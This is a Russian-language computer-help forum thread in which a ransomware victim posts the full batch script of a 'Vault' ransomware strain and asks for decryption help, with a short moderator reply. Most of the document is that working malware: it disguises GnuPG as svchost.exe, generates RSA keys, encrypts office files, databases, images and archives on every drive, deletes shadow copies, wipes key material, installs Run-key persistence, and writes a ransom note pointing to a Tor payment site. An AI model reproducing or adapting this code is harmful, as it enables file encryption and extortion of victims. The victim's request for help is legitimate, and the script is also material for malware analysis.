Перейти к содержанию

Криптор по Вашей спецификации ransom.scatter..... далее буквы

billandrew

Автор billandrew
в Компьютерная помощь

 Поделиться

Рекомендуемые сообщения

billandrew

billandrew

Опубликовано
Опубликовано

Удалось получить полный набор файлов после работы вируса... правда не все папки обработал.....

как видно из работы вируса шифрование идёт бесплатной "gnu" программой gpg....

неужели Вы не посмотрели, что происходит в результате работы .js скрипта?

Не верю...

Да батник мощный 32 кБ.... 

Неужели Ваша группа не скажет как декриптовать файлы....  ? Или рекомендации выдать?... Вчера Вам выкладывал тело... ни ответа ни привета.... А DR WEB сказал виряк...

Заразил виртуалку ... посмотрел...Ну просто не только этим на работе приходится заниматься... есть серваки с бэкупами ...это спасает

Настораживает реагирование Вашей команды на обновление...

Но!!

Жду от Вас ответов... 

 

У нас установлен корпоративный KES 8 ....

thyrex

thyrex

Опубликовано
Опубликовано

 

 


Вчера Вам выкладывал тело
Кому и что Вы выкладывали, нам неведомо.

 

 

Про RSA-шифрование почитайте и картинка у Вас сложится

billandrew

billandrew

Опубликовано
  • Автор
Опубликовано

Давайте рассмотрим механизм вируса ... приходит .js скрипт... который формирует исполняемые файлы для исполнения (шифрации... генерит ключи)
даллее исполняется bat файл

 
 
 

тушка:

 

@ECHO OFF
SetLocal EnableDelayedExpansion
cd "%temp%"
if not exist "%temp%\f44cf952.46ea399a" (
echo 85ceb2b1 > "%temp%\f44cf952.46ea399a"
attrib +s +h "%temp%\f44cf952.46ea399a"
) else (goto 85ceb2b1)
RENAME "%temp%\sv.css" svchost.exe
chcp 866
set 09a1fc9f=!RANDOM!
set a4503f0c=!RANDOM!
set a1a467b7=!RANDOM!
set bca3d227=!RANDOM!
set 376941d6=!RANDOM!
set f7adffe3=!RANDOM!
set cfc85ace=!RANDOM!
set 5378782f=RU
if exist "%APPDATA%\gnupg" RENAME "%APPDATA%\gnupg" gnupg_%random%
echo Key-Type: RSA> "%temp%\c59c6019.63418256"
echo Key-Length: 1024>> "%temp%\c59c6019.63418256"
echo Name-Real: Cellar>> "%temp%\c59c6019.63418256"
echo Name-Comment: Cellar>> "%temp%\c59c6019.63418256"
echo Name-Email: v@u.lt>> "%temp%\c59c6019.63418256"
"%temp%\svchost.exe" --batch --homedir "%temp%" --gen-key "%temp%\c59c6019.63418256"
echo -----BEGIN PGP PUBLIC KEY BLOCK-----> "%temp%\0e2b6c70.05ecac0a"
echo Version: GnuPG v1>> "%temp%\0e2b6c70.05ecac0a"
echo.>> "%temp%\0e2b6c70.05ecac0a"
echo mI0EVMTCdAEEALiK/XRUVtlYEgRgVsCdCGOFuuPlAayDcpq0mPXZTWX6hqkw6zJp>> "%temp%\0e2b6c70.05ecac0a"
echo Wtq66dUSeqFq2uFD8Gf1sYGanUztuwNHGCJcZOmCEhuzwu5aDOjfgQic4iRrwzIs>> "%temp%\0e2b6c70.05ecac0a"
echo mhXNVJ7o4iShfaVDWqJYxx2EkIakG8PefpqS57uB9Qncka+BGvu889C7ABEBAAG0>> "%temp%\0e2b6c70.05ecac0a"
echo SFZhdWx0Q3J5cHQgKFZhdWx0Q3J5cHQpIDxCTS1OQkpheHJ0NHJpdVZyQ3E1TlZj>> "%temp%\0e2b6c70.05ecac0a"
echo THJGQzVDWUNZa3hwbUBCaXRtZXNzYWdlPoi4BBMBAgAiBQJUxMJ0AhsDBgsJCAcD>> "%temp%\0e2b6c70.05ecac0a"
echo AgYVCAIJCgsEFgIDAQIeAQIXgAAKCRAW1lPUttqywK3UA/4ut/3gHWP43kANXaS1>> "%temp%\0e2b6c70.05ecac0a"
echo BZOwrqM8jZIHM/37nKfjpyy0t7YBGJL3bvkW7R+119jXIb6A+0lJTuBYGPkaiK3w>> "%temp%\0e2b6c70.05ecac0a"
echo iSER5Nrlkbu2Ph1i1ammIz/zZ8M12YWgLXlUYEaan7X5qKwXPsLcliAuqaL/lPyh>> "%temp%\0e2b6c70.05ecac0a"
echo Ln9O8Y1tY7D4zm2nl5vTxnopaLiNBFTEwnQBBADZHzHXCsAqeA2LwGEVhgny8JQ+>> "%temp%\0e2b6c70.05ecac0a"
echo 301eW/rtPzcVSq0j7vmkEO8jO8PVabkOCwflAlfZgtuFaJD49KvcQRcDPXSN2kJI>> "%temp%\0e2b6c70.05ecac0a"
echo mvfYRflRupa7lq0LnGlOsndGbpzjjZRUHBNeUR+LQbZnRfnBpqFDIKk3/uhPFNDg>> "%temp%\0e2b6c70.05ecac0a"
echo djrZYRLcl2tJa3V9zwARAQABiJ8EGAECAAkFAlTEwnQCGwwACgkQFtZT1LbassCL>> "%temp%\0e2b6c70.05ecac0a"
echo 5wP+O5Js6zJT/cFYCcUuWuYs9wIng65Y+YV+y6/7p8/OTwfxazhB65fG7hdThYPt>> "%temp%\0e2b6c70.05ecac0a"
echo 9b4dgiEBdefeDvZwAWE5CJwdAeTsJT3OuPrMq9/fRaW3gooP/sJoWRS47mQGnIiu>> "%temp%\0e2b6c70.05ecac0a"
echo DeONVwIPHeUzrKd1+jSCHcUvbJ4stmOpSNm5mGy6Ww2DKoM=>> "%temp%\0e2b6c70.05ecac0a"
echo =E61M>> "%temp%\0e2b6c70.05ecac0a"
echo -----END PGP PUBLIC KEY BLOCK----->> "%temp%\0e2b6c70.05ecac0a"
"%temp%\svchost.exe" -r Cellar --export-secret-keys --yes --homedir "%temp%" -a> "%temp%\94a07c55.e3bc4cda"
del /f /q "%temp%\c59c6019.63418256"
echo.>> "%temp%\94a07c55.e3bc4cda"
echo BDATE: !DATE!>> "%temp%\94a07c55.e3bc4cda"
echo UNAME: !USERNAME!>> "%temp%\94a07c55.e3bc4cda"
echo CNAME: !COMPUTERNAME!>> "%temp%\94a07c55.e3bc4cda"
echo ULANG: !5378782f!>> "%temp%\94a07c55.e3bc4cda"
echo 01HSH: !09a1fc9f!>> "%temp%\94a07c55.e3bc4cda"
echo 02HSH: !a4503f0c!>> "%temp%\94a07c55.e3bc4cda"
echo 03HSH: !bca3d227!>> "%temp%\94a07c55.e3bc4cda"
echo 04HSH: !a1a467b7!>> "%temp%\94a07c55.e3bc4cda"
echo 05HSH: !376941d6!>> "%temp%\94a07c55.e3bc4cda"
echo FHASH: !f7adffe3!>> "%temp%\94a07c55.e3bc4cda"
echo chcp 866 > "%temp%\d3953d7b.0be0992b"
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :22ecc455 %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 01FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 01FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 01FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
goto d031f0d0
:22ecc455
dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\d3953d7b.0be0992b"
echo %%i>> "%temp%\6ed1feb7.f8c26ce8"
)
goto:eof
:d031f0d0
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\7415c2e1.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\7415c2e1.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\7415c2e1.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\7415c2e1.vbs"
echo var cdp="%%TEMP%%\\3c21b8d9.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\70e43f3c.js"
echo.> "%temp%\3c21b8d9.cmd"
echo SetLocal EnableDelayedExpansion>> "%temp%\3c21b8d9.cmd"
echo for /f "tokens=2*" %%%%i in ^('reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentVersion"'^) do set fnd7=%%%%j>> "%temp%\3c21b8d9.cmd"
echo if not %%fnd7:~0,1%% GEQ 6 goto 1fe9ff9e>> "%temp%\3c21b8d9.cmd"
echo set ntries=^0>> "%temp%\3c21b8d9.cmd"
echo :641d832b>> "%temp%\3c21b8d9.cmd"
echo wscript.exe //B //Nologo "%%temp%%\7415c2e1.vbs"^& tasklist^|findstr /i wmic.exe>> "%temp%\3c21b8d9.cmd"
echo if not ^^!errorlevel^^!==0 ^(>> "%temp%\3c21b8d9.cmd"
echo set /a ntries+=^1>> "%temp%\3c21b8d9.cmd"
echo if not ^^!ntries^^! GEQ 16 goto 641d832b>> "%temp%\3c21b8d9.cmd"
echo ^)>> "%temp%\3c21b8d9.cmd"
echo :1fe9ff9e>> "%temp%\3c21b8d9.cmd"
echo del /f /q "%temp%\70e43f3c.js">> "%temp%\3c21b8d9.cmd"
echo del /f /q "%temp%\7415c2e1.vbs">> "%temp%\3c21b8d9.cmd"
echo echo del /f /q "%temp%\7415c2e1.vbs">> "%temp%\3c21b8d9.cmd"
echo echo f3fb8b4e ^> "%%temp%%\3c21b8d9.cmd">> "%temp%\3c21b8d9.cmd"
start wscript.exe //B //Nologo "%temp%\70e43f3c.js"
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :749220a2 %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 02FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 02FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 02FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
goto fcadef08
:749220a2
dir /B "%1:\"&& for /r "%1:\" %%i in (*.pdf *.rtf) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\d3953d7b.0be0992b"
echo %%i>> "%temp%\6ed1feb7.f8c26ce8"
)
goto:eof
:fcadef08
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :215d84d4 %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 03FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 03FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 03FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
goto fe59fbb1
:215d84d4
dir /B "%1:\"&& for /r "%1:\" %%i in (*.psd *.dwg *.cdr) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\d3953d7b.0be0992b"
echo %%i>> "%temp%\6ed1feb7.f8c26ce8"
)
goto:eof
:fe59fbb1
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :bb6b9a06 %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 04FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 04FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 04FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
goto 397f0a8e
:bb6b9a06
dir /B "%1:\"&& for /r "%1:\" %%i in (*.cd *.mdb *.1cd *.dbf *.sqlite) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\d3953d7b.0be0992b"
echo %%i>> "%temp%\6ed1feb7.f8c26ce8"
)
goto:eof
:397f0a8e
FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :bf36bc0d %%s
echo if exist "%%TeMp%%\VAULT.KEY" echo 05FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%AppDATA%%\VAULT.KEY" echo 05FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 05FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
goto 770353bd
:bf36bc0d
dir /B "%1:\"&& for /r "%1:\" %%i in (*.jpg *.zip) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\d3953d7b.0be0992b"
echo %%i>> "%temp%\6ed1feb7.f8c26ce8"
)
goto:eof
:770353bd
echo echo FHASH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo echo FHASH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo echo FHASH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\d3953d7b.0be0992b"
echo echo 6bec1173 ^> "%%TeMp%%\440b0b96.cmd">> "%temp%\d3953d7b.0be0992b"
echo del /f /q "%%TeMp%%\440b0b96.cmd">> "%temp%\d3953d7b.0be0992b"
findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "%temp%\6ed1feb7.f8c26ce8"> "%temp%\c01bb50a.dff42b50"
findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "%temp%\d3953d7b.0be0992b"> "%temp%\840a10bd.16b4915e"
findstr /v "AppData APPDATA appdata temp TEMP Temp" "%temp%\c01bb50a.dff42b50"> "%temp%\ea2f8672.381f76bf"
findstr /v "AppData APPDATA appdata temp TEMP Temp" "%temp%\840a10bd.16b4915e"> "%temp%\440b0b96.cmd"
del /f /q "%temp%\c01bb50a.dff42b50"
del /f /q "%temp%\840a10bd.16b4915e"
del /f /q "%temp%\6ed1feb7.f8c26ce8"
del /f /q "%temp%\d3953d7b.0be0992b"
echo XCONF: !cfc85ace!>> "%temp%\94a07c55.e3bc4cda"
set c47f173a=66668
for /f %%f in ('find /c /v ""^< "%temp%\ea2f8672.381f76bf"') do (
set c47f173a=%%f
)
echo QNTTY: !c47f173a!>> "%temp%\94a07c55.e3bc4cda"
for %%c IN (01:xls 04:doc 05:rtf 10:pdf 11:psd 12:dwg 13:cdr 19:cd 20:mdb 21:1cd 23:dbf 24:sqlite 26:jpg 27:zip) do (
for /f "tokens=1,2 delims=:" %%i in ("%%c") do (
for /f %%b in ('find /c /i ".%%j"^< "%temp%\ea2f8672.381f76bf"') do (
echo %%iEXT: %%b>> "%temp%\94a07c55.e3bc4cda"
)))
echo 02EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 03EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 06EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 07EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 08EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 09EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 14EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 15EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 16EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 17EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 18EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 22EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 25EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 28EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo 29EXT: 0 >> "%temp%\94a07c55.e3bc4cda"
echo.>> "%temp%\ea2f8672.381f76bf"
echo XCONF: !cfc85ace!>> "%temp%\ea2f8672.381f76bf"
"%temp%\svchost.exe" --import "%temp%\0e2b6c70.05ecac0a"
del /f /q "%temp%\0e2b6c70.05ecac0a"
"%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "%temp%\VAULT.KEY" -e "%temp%\94a07c55.e3bc4cda"
"%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "%temp%\CONFIRMATION.KEY" -e "%temp%\ea2f8672.381f76bf"
if not exist "%temp%\VAULT.KEY" (
"%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\94a07c55.e3bc4cda"
RENAME "%temp%\94a07c55.e3bc4cda.gpg" VAULT.KEY
)
if not exist "%temp%\CONFIRMATION.KEY" (
"%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\ea2f8672.381f76bf"
RENAME "%temp%\ea2f8672.381f76bf.gpg" CONFIRMATION.KEY
)
if not exist "%temp%\VAULT.KEY" (
del /f /q "%temp%\*.vlt"
del /f /q "%temp%\*.gpg"
del /f /q "%temp%\random_seed"
del /f /q "%temp%\*.lock"
del /f /q "%temp%\*.bak"
del /f /q "%temp%\*.list"
goto 72fde7d3
)
echo.>> "%temp%\VAULT.KEY"
echo 01FNSH-!09a1fc9f!>> "%temp%\VAULT.KEY"
echo 02FNSH-!a4503f0c!>> "%temp%\VAULT.KEY"
echo 03FNSH-!bca3d227!>> "%temp%\VAULT.KEY"
echo 04FNSH-!a1a467b7!>> "%temp%\VAULT.KEY"
echo 05FNSH-!376941d6!>> "%temp%\VAULT.KEY"
echo FHASH-!f7adffe3!>> "%temp%\VAULT.KEY"
 
echo 6387669ad690e17104442bd2e6355ca8 47b1ab0c40e9cfd9b276ebf8> "%temp%\secring.qpq"
echo 381f76bfc47f173a 72fde7d35d11158147b1ab0cff9c5ac004fba9ba>> "%temp%\secring.qpq"
echo 381f76bf c47f173a72fde7d3 5d11158147b1ab0c ff9c5ac004fba9ba>> "%temp%\secring.qpq"
echo 7415c2e170e43f3c3c21b8d9641d832b 1fe9ff9ef3fb8b4e749220a2>> "%temp%\secring.qpq"
echo bb6b9a06bf36bc0d 770353bd6bec1173440b0b96c01bb50adff42b50>> "%temp%\secring.qpq"
echo 70e43f3c 770353bd e6355ca804442bd2 56f58c2f ff9c5ac004fba9ba>> "%temp%\secring.qpq"
move /y "%temp%\secring.qpq" "%temp%\secring.gpg"
echo 381f76bf c47f173a72fde7d3 5d11158147b1ab0c ff9c5ac004fba9ba> "%temp%\e3bc4cda94a07c55.qpq"
echo bb6b9a06bf36bc0d 770353bd6bec1173440b0b96c01bb50adff42b50>> "%temp%\e3bc4cda94a07c55.qpq"
echo 7415c2e170e43f3c3c21b8d9641d832b 1fe9ff9ef3fb8b4e749220a2>> "%temp%\e3bc4cda94a07c55.qpq"
echo bb6b9a06bf36bc0d 770353bd6bec1173440b0b96c01bb50adff42b50>> "%temp%\e3bc4cda94a07c55.qpq"
echo 70e43f3c 770353bd e6355ca804442bd2 56f58c2f ff9c5ac004fba9ba>> "%temp%\e3bc4cda94a07c55.qpq"
echo 7415c2e170e43f3c3c21b8d9641d832b 1fe9ff9ef3fb8b4e749220a2>> "%temp%\e3bc4cda94a07c55.qpq"
echo 6387669ad690e17104442bd2e6355ca8 47b1ab0c40e9cfd9b276ebf8>> "%temp%\e3bc4cda94a07c55.qpq"
echo 381f76bfc47f173a 72fde7d35d11158147b1ab0cff9c5ac004fba9ba>> "%temp%\e3bc4cda94a07c55.qpq"
move /y "%temp%\e3bc4cda94a07c55.qpq" "%temp%\94a07c55.e3bc4cda"
echo 7415c2e170e43f3c3c21b8d9641d832b 1fe9ff9ef3fb8b4e749220a2> "%temp%\381f76bfea2f8672.qpq"
echo 381f76bfc47f173a 72fde7d35d11158147b1ab0cff9c5ac004fba9ba>> "%temp%\381f76bfea2f8672.qpq"
echo 6387669ad690e17104442bd2e6355ca8 47b1ab0c40e9cfd9b276ebf8>> "%temp%\381f76bfea2f8672.qpq"
move /y "%temp%\381f76bfea2f8672.qpq" "%temp%\ea2f8672.381f76bf"
del /f /q "%temp%\secring.gpg"
del /f /q "%temp%\94a07c55.e3bc4cda"
del /f /q "%temp%\ea2f8672.381f76bf"
del /f /q "%temp%\6ed1feb7.f8c26ce8"
del /f /q "%temp%\random_seed"
del /f /q "%temp%\trustdb.gpg"
del /f /q "%temp%\secring.gpg"
del /f /q "%temp%\*.lock"
del /f /q "%temp%\*.bak"
attrib -s -h -r "%AppData%\gnupg\*.*"
attrib -s -h -r "%AppData%\gnupg"
del /f /q "%AppData%\gnupg\*.*"
rmdir /s /q "%AppData%\gnupg"
copy /y "%temp%\CONFIRMATION.KEY" "%appdata%\CONFIRMATION.KEY"
copy /y "%temp%\VAULT.KEY" "%appdata%\VAULT.KEY"
copy /y "%temp%\VAULT.KEY" "%temp%\04fba9ba_VAULT.KEY"
echo 01FNSH-OK>> "%temp%\04fba9ba_VAULT.KEY"
echo 02FNSH-OK>> "%temp%\04fba9ba_VAULT.KEY"
echo 03FNSH-OK>> "%temp%\04fba9ba_VAULT.KEY"
echo 04FNSH-OK>> "%temp%\04fba9ba_VAULT.KEY"
echo 05FNSH-OK>> "%temp%\04fba9ba_VAULT.KEY"
echo FHASH-OK>> "%temp%\04fba9ba_VAULT.KEY"
attrib +r "%temp%\04fba9ba_VAULT.KEY"
copy /y "%temp%\VAULT.KEY" "%userprofile%\Desktop\VAULT.KEY"
echo.> "%temp%\VAULT.txt"
echo Ваши рабочие документы и базы данных были заблокированы и помечены форматом .vаult >> "%temp%\VAULT.txt"
echo Для их восстановления необходимо получить уникальный ключ>> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo   ПРОЦЕДУРА ПОЛУЧЕНИЯ КЛЮЧА: >> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo КРАТКО>> "%temp%\VAULT.txt"
echo 1. Зайдите на наш веб-ресурс>> "%temp%\VAULT.txt"
echo 2. Гарантированно получите Ваш ключ>> "%temp%\VAULT.txt"
echo 3. Восстановите файлы в прежний вид>> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo ДЕТАЛЬНО>> "%temp%\VAULT.txt"
echo   Шаг 1:>> "%temp%\VAULT.txt"
echo Скачайте Tor браузер с официального сайта: https://www.torproject.org>>"%temp%\VAULT.txt"
echo   Шаг 2:>> "%temp%\VAULT.txt"
echo Используя Tor браузер посетите сайт: http://restoredz4xpmuqr.onion>>"%temp%\VAULT.txt"
echo   Шаг 3:>> "%temp%\VAULT.txt"
echo Найдите Ваш уникальный VAULT.KEY на компьютере - это Ваш ключ к личной клиент-панели. Не удалите его>> "%temp%\VAULT.txt"
echo Авторизируйтесь на сайте используя ключ VAULT.KEY>> "%temp%\VAULT.txt"
echo Перейдите в раздел FAQ и ознакомьтесь с дальнейшей процедурой>> "%temp%\VAULT.txt"
echo   STEP 4:>> "%temp%\VAULT.txt"
echo После получения ключа, Вы можете восстановить файлы используя наше ПО с открытым исходным кодом или же безопасно использовать своё ПО>> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo ДОПОЛНИТЕЛЬНО>> "%temp%\VAULT.txt"
echo a^) Вы не сможете восстановить файлы без уникального ключа ^(который безопасно хранится на нашем сервере^)>> "%temp%\VAULT.txt"
echo b^) Если Вы не можете найти Ваш VAULT.KEY, поищите во временной папке TEMP >> "%temp%\VAULT.txt"
echo c^) Ваша стоимость восстановления не окончательная, пишите в чат>> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo   Дата блокировки: %date% ^(%time:~0,5%^)>> "%temp%\VAULT.txt"
copy /y "%temp%\VAULT.txt" "%userprofile%\Desktop\vault.txt"
attrib +h "%userprofile%\Desktop\vault.txt"
echo var cdp="%%TeMp%%\\440b0b96.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');>> "%temp%\fabac41c.js"
"%TEMP%\svchost.exe" --import "%TEMP%\pubring.gpg"
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "f4e4bf4e" /t REG_SZ /f /d "notepad %temp%\VAULT.txt"
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "5dd61003" /t REG_SZ /f /d "attrib -h %userprofile%\Desktop\vault.txt"
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "4323ae20" /t REG_SZ /f /d "wscript //B //Nologo %temp%\fabac41c.js"
call "%temp%\440b0b96.cmd"
echo ^<html^>^<head^>^<hta:application BORDER = "none" CAPTION = "No" CONTEXTMENU = "Yes" INNERBORDER = "No" MAXIMIZEBUTTON = "No" MINIMIZEBUTTON = "No" NAVIGABLE = "No" SCROLL = "No" SCROLLFLAT = "No" SELECTION = "Yes" SHOWINTASKBAR = "No" SINGLEINSTANCE = "Yes" SYSMENU = "No"/^>^<style^>body{cursor:default;background-color:#E7E7E7;margin:0;font-family:"HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,sans-serif;text-align:center;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaAgMAAADUJKRdAAAACVBMVEXs7Ozv7+/6+vqH/Ct2AAAAW0lEQVQI11WOsQ2DABADv8gAGQFd4SJTZARGQC5cMBX1T0mD4ClP9lmutf71qW/t3d19VBLDcrNR7KV+F4Mx28OKyMzf/UDINvYADR9A08cwfcnjDwmarOBn7wSqEUpFZuJdBQAAAABJRU5ErkJggg==)}.vaustyle{margin:10px;height:520px;width:1100px}.sc{margin:10px 150px;font-size:40px;width:900px;padding:20px;background-color:#7a7a7a;color:#FF4C4C;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}.briefly{position:absolute;left:50px;width:480px}.detailed{display:inline-block;margin-left:530px;width:660px}.bti{background-color:#DFDFDF;color:#555;font-size:28px;padding:10px}hr{width:90%%}.sced{margin-top:15px;text-align:center;font-size:27px;height:220px;padding:20px;background-color:#6a6a6a;line-height:1.5;color:#EAEAEA;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}form{display:inline}.dbutt{margin-left:2px;font-size:16px;font-weight:500;border:none;background-color:#9f9f9f;color:#EEE;cursor:pointer}.footer{text-align:left;position:relative;width:600px;margin:2px 2px 2px 45px;height:16px;font-size:15px;background-color:#CFCFCF;color:#444;padding:6px}.fnl{font-size:21px}^</style^>^<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/^>^<title^>Vault Notification^</title^>^<script language="vbscript"^>> "%temp%\aceb2c042b18bf38.hta"
echo sub Window_Onload>> "%temp%\aceb2c042b18bf38.hta"
echo window.resizeTo 1280,725>> "%temp%\aceb2c042b18bf38.hta"
echo screenWidth = Document.ParentWindow.Screen.AvailWidth>> "%temp%\aceb2c042b18bf38.hta"
echo screenHeight = Document.ParentWindow.Screen.AvailHeight>> "%temp%\aceb2c042b18bf38.hta"
echo posLeft = (screenWidth - 1280) / 2 >> "%temp%\aceb2c042b18bf38.hta"
echo posTop = (screenHeight - 725) / 2 >> "%temp%\aceb2c042b18bf38.hta"
echo window.moveTo posLeft, posTop >> "%temp%\aceb2c042b18bf38.hta"
echo end sub >> "%temp%\aceb2c042b18bf38.hta"
